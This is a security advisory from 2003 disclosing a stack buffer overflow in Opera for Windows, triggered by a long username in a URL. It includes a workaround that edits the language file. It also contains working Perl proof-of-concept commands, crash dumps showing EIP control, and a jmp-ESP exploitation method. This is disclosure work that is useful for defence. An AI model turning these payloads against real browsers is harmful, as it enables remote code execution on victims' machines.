Hello all. We release the information about the vulnerability of Opera, here. And we wish that this vulnerability is fixed by Vendor, immediately. ___________________________________________________ -------------------------------------------------------------- Synopsis: Opera Username Buffer Overflow Vulnerability Product: Opera for Windows Version: 6.05 build1140 (and Opera7 beta2 build2577) Vendor: Opera Software ASA (http://www.opera.com/) Risk: High. Execute arbitrary binary code Remote: Yes Local: Yes Discovered: nesumin <nesumin (at) softhome (dot) net [email concealed]> Reported: 2003-02-02 Published: 2003-02-09 -------------------------------------------------------------- Product : Opera for windows is GUI base WEB Browser. It has Mail, News, IM client. Opera Software ASA http://www.opera.com/ OverView : Opera6.05 build 1140 (and Opera7 beta2 build 2577) for Windows has the critical vulnerability. When Opera will open the URL of HTTP that contains the "a long username", buffer overflow occurs on the stack. An attacker can cause it using link(anchor tag), picture(image tag), frame, script, etc. Then, it can overwrite saved RET address on stack, and it enables to execute the arbitrary binary code. If Opera user opens malicious URL, they may suffer damage, such as system destruction and virus infection, etc. Tested on : Opera Opera6.05 build 1140 Opera7 beta2 build 2577 Opera7.00 build 2637 Opera7.01 build 2651 English edition and Japanese edition. Platform Windows98SE JP Windows2000 SP3 JP WindowsXP SP1 JP Vulnerable in tested : Opera6.05 build 1140 Opera7 beta2 build 2577 Unvulnerable in tested : Opera7.00 build 2637 Opera7.01 build 2651 Vendor status : Already reported, 2003/02/02. But we don't know the correspondence and attitude of Opera Software ASA against this vulnerability because we didn't have the formal reply from Opera Software ASA. Solution : We propose the following temporary method until this vulnerability is fixed by vendor. It is the method of deleting two "%s" from the string of the resource number "21463" in the language file (*.lng). Thereby, User name and Server name is also no longer displayed in the URL warning dialog. Details : When Opera will open the URL of HTTP Protocol that contains an user name, it will use the format string of the resource number "21463" in a language file, and will generate the string for displaying on the "URL Warning Dialog". Then Overflow occurs by the Local Buffer on the Stack by specifying "long user name", because there is not length-check against the user name. (The length of the whole URL has restriction) The RET address can be overwritten by about 2624 characters (16bits), it depends on the string of "21463". [Opera6.05 build 1140, english language file] $ perl -e "exec('opera.exe', 'http://'. 'A' x 2624 .'@/')" --------------------------------------------------------------------- Exception C0000005 EAX=00410041 EBX=01B5F9BA ECX=0012E254 EDX=01B60E58 ESI=01A8A940 EDI=77DF6001 EBP=0012E278 ESP=0012CDD8 EIP=00423D68 FLAGS=00000216 0012CDD8 00000110 00000001 005F2464 00200020 ........d$_. . . 0012CDE8 00200020 00730055 00720065 0061006E . .U.s.e.r.n.a. 0012CDF8 0065006D 0020003A 00410041 00410041 m.e.:. .A.A.A.A. 0012CE08 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A. .... 0012E268 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A. 0012E278 >00410041 00410041 007D0020 007C031E A.A.A.A. .....|. 0012E288 01A8A940 007D02D0 0012E2D8 00000000 @.....}...E..... --------------------------------------------------------------------- In the above case, Access violation occurs before EIP moves to the RET address. But EIP is movable by setting the fake values, 0x80000001 or other values to the area which is referred to after overwritten. $ perl -e "exec('opera.exe', 'http://'.'%01%e8%80%80' x 1311 .'%ef%bb%be' x 2 .'@/')" "%01%e8%80%80" = 0x80000001, "%ef%bb%be%ef%bb%be" = 0xfefefefe (with "Encode all addresses with UTF-8" setting.) --------------------------------------------------------------------- Exception C0000005 EAX=00000001 EBX=005F2464 ECX=00010101 EDX=F03639D8 ESI=00000001 EDI=00000110 EBP=80000001 ESP=0012E28C *EIP=FEFEFEFE FLAGS=00000202 --------------------------------------------------------------------- ESP register points to the position of the RET address's offsets value + about 0x10 bytes. Therefore, It is possible to execute the arbitrary binary code by overwriting the RET address in the address of the "jmp ESP" instruction, putting the binary code after the area which is pointed by ESP register. In Opera7.0 build 2637 or later, we could not confirm this vulnerability. [Note] The user name written in the buffer by this vulnerability is changed into 16bit wide characters. When the setting of "Encode all addresses with UTF-8" is enabled and the user name encoded by UTF or etc is specified, the exploit data easily can be set on the stack. And, If the setting of it is disabled, It becomes very difficult. Sample Code : (attached file) o6unexp.c This program is the generator that creates Exploit HTML files. test compiled, Visual C++ 6. * This source code is only as sample checking vulnerability. * It is a user's responsibility whatever result is occurred by this code. Special thanks : :: Operash :: [ Unofficial Opera's Bug and Security information site for Japanese people ] imagine (Operash webmaster) melorin Contacts, Etc : nesumin <nesumin (at) softhome (dot) net [email concealed]> This information does not assure the contents. We may correct the contents of this information to timely. We take no responsibility for any damage generated by using this information. ___________________________________________________ -------------------------------------------------- nesumin <nesumin (at) softhome (dot) net [email concealed]>